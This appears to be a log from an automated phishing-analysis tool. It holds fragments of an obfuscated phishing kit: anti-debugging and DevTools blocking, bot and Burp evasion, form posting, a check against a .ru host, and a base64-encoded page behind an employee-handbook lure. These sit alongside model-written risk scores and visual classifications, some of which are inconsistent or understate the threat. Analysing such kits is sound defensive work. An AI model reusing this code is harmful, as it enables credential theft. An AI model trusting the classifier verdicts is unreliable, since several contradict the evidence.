        const apyqWHUYCb = performance.now();
        debugger;
        const FepOEGvuVz = performance.now();
        if (FepOEGvuVz - apyqWHUYCb > cXJHXhwfwT && !JkbyaziqxY) {
            aCqGbxcKWf = true;
            JkbyaziqxY = true;
            window.location.replace('https://login.microsoftonline.com');
        }
    }, 100);
})();
    

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and suspicious domain interactions. It uses the `turnstile.render()` function to render a form, but also sets up event handlers and makes multiple network requests to potentially malicious domains. The script appears to be collecting user data and redirecting users to a Microsoft login page, which is highly suspicious behavior indicative of a phishing or malware attempt."
}

turnstile.render('#cf', {
    sitekey: '0x4AAAAAAA5XFStEU8QXcfg8',
    'error-callback': OntgkDNeip,
    callback: JTerqrZiWZ,
});
function OntgkDNeip() {
    turnstile.reset();
}
function JTerqrZiWZ() {
    var HLgktqYJWM = document.getElementById("gZQHQcLuew");
    HLgktqYJWM.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = 'gu8d7L';
    var tQycYAnarq = "../rmiw28dfvk3yJUG5A5k1dW6g4qqs98BNyo";
    fetch('https://ZfGARj9JUo9LEBQ8HY2wndXZZivyLFicpVZCP41k7utcwgpnLYTR06gAF1m.gageodeg.ru/wginwijaxuokewuwJtTeftSgPDRJKVRJYEHDKUHUICHDYJATUWUZMJPHAERLVQIOHGCAQWMUC', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    if(text == 0){
    fetch(tQycYAnarq, {
        method: "POST",
        body: new FormData(HLgktqYJWM)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        if(aCqGbxcKWf == false){
        location.reload();
        }
        }
        if(data['status'] == 'error'){
        window.location.replace('https://login.microsoftonline.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://login.microsoftonline.com');
    }
    })
    .catch(error => {
    window.location.replace('https://login.microsoftonline.com');
    });
}

{
    "risk_score": 6,
    "reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from bots and other malicious activity. While the script contains some obfuscated code and makes external requests, it is likely part of a legitimate security solution and not a malicious script. However, the extensive use of obfuscation and the presence of some potentially sensitive data being sent to external domains warrant a medium risk score for further review."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'o7zrc',
                chlApiSitekey: '0x4AAAAAAA5XFStEU8QXcfg8',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: 'EoDjNcmXd4eVqrWc2whOPq3JKF1I9qdhxIpJhMXI7TM-1737488675-1.3.1.1-C0CWpekZmB_WjPaihx957k4xeHTcYnvU8EpY8BHPmMA',
                chlApiResetSrc: 'new',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '9059ccbf0e2b8c87',
                cH: 'kjnSw6tkirQVbheArsQhESDwsAYhNK8E92.Z6kEUhnQ-1737488675-1.1.1.1-a72RysMrxCzcZ5wJCGz6_9UgV2fwpnqJa6NblTKIb_eOTGilbAWROwghuiEOLwjL',
                cFPWv: 'g',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'auto',
                wS: 'normal',
                md: '0AuzI1owMwjdBWZUpkNC.vHBL2vvAPOu5XYJVk0G_e4-1737488675-1.1.1.1-A5lIKKFxV5BmTt05igEQxacl6wfqSLeleqPfdtfWfq3YhqwKlOX1C9f6JZJw9hJ5Dgxgy12AjP8eu5rZc88_MWdNBz.XPgPPqt4ecsiVJjNxnlXxip1eNuXr3I5tdAMuH67qZd98nN3lIC4yOm_NTPSnuDSSGZHfJzP06oguAHtMlUZJtRp9oYX6aYcuvlazNaYV1BTdBkJqKPxjcRK_O4HMRck5ZmcOkaVOm7NGTUSgxe4wTukiVMjLnMixpf3H42KWDKu3Uhj1jqgJdwRHzEa8P8GKf11R_GJxGZ2NVr58Ox6ZJrzrjXb7YoAJ2Xinw_JGofxm.LDRlrC.pGwY8d25NTKewgvgJBG491J2_WFZSzt2zg0wFqrPqIZi_o0DeaJp6ehVHEVXSoPzR_UKS.VhQfrTetbGqSOnOOR3mk6Q2lEp34XGox8N4SZuSsRf_RN.8z.Pd0MlaXeocBPT4tTexo7or1sOoC9a05cNHRd4j8HXWxih3LDfiZJBF1RvZWsmWVptdREWWCE.U8sqixMKSs4TW93MZKO3zr6_gtiqfS_r7Dn543Q8MfLrZWHQY_a_Ztk_0c4Fnt_Jk7scA9_5aEFjdK3Ih9lRe6j8cXRLBKnML5yN5N9wzvlpyejlNEf6BVmUP.lfMEzeO_2PucbkGmZnvS4qXIVNeVoDAUEL17h4TUDAKGA4FcSk5V

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to execute remote code, along with the attempt to send user data to an untrusted domain, are clear indicators of malicious intent. Additionally, the script attempts to disable common browser security features like the context menu and certain keyboard shortcuts, further suggesting a malicious purpose. Overall, this script demonstrates a high level of risk and should be treated with caution."
}

if(atob("aHR0cHM6Ly9EbWsuZXJiaXJraW5hcmluZi5ydS91ZlBsVE8yWS8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiN2dldRTUhKeXBUIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI3Z2V1FNSEp5cFQgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3Z2V1FNSEp5cFQgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojdnZXUU1ISnlwVCBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3Z2V1FNSEp5cFQuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNTNweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI3Z2V1FNSEp5cFQgLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiN2dldRTUhKeXBUIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojdnZXUU1ISnlwVCAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiN2dldRTUhKeXBUIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiN2dldRTUhKeXBUIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojdnZXUU1ISnlwVCAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojdnZXUU1ISnlwVC5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI3Z2V1FNSEp5cFQgLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiN2dldRTUhKeXBUICNHYW1zcWJWSU1KIHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQphQ3FHYnhjS1dmID0gZmFsc2U7DQooZnVuY3Rpb24gV0REcEtXRUhNZCgpIHsNCiAgICBsZXQgSmtieWF6aXF4WSA9IGZhbHNlOw0KICAgIGNvbnN0IGNYSkhYaHdmd1QgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IGFweXFXSFVZQ2IgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAg

{
  "contains_trigger_text": true,
  "trigger_text": "IT'S TIME TO REVIEW YOUR EMPLOYEE HANDBOOK",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "employee handbook"
}

{
  "contains_trigger_text": true,
  "trigger_text": "IT'S TIME TO REVIEW YOUR EMPLOYEE HANDBOOK",
  "prominent_button_name": "ACCESS HANDBOOK",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

{
  "brands": "unknown"
}

{
  "brands": "unknown"
}

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false,
  "page_classification": "unknown"
}

```json{  "brand": "unknown",  "brand_classification": "unknown",  "legit_url": "unknown",  "similarity": 2,  "spoofed": 1,  "reasoning": "The URL 'https://dmk.erbirkinarinf.ru' does not closely resemble any well-known brand or legitimate URL. There are no obvious character substitutions or visual similarities to a known brand. The domain 'erbirkinarinf.ru' does not suggest any connection to a recognized brand, and the subdomain 'dmk' does not provide any clear indication of typosquatting. The structure and context of the URL do not imply a deceptive intent, and it could be related to a legitimate purpose unrelated to any known brand."}

URL: https://dmk.erbirkinarinf.ru

{
  "brands": [
    "Cloudflare"
  ]
}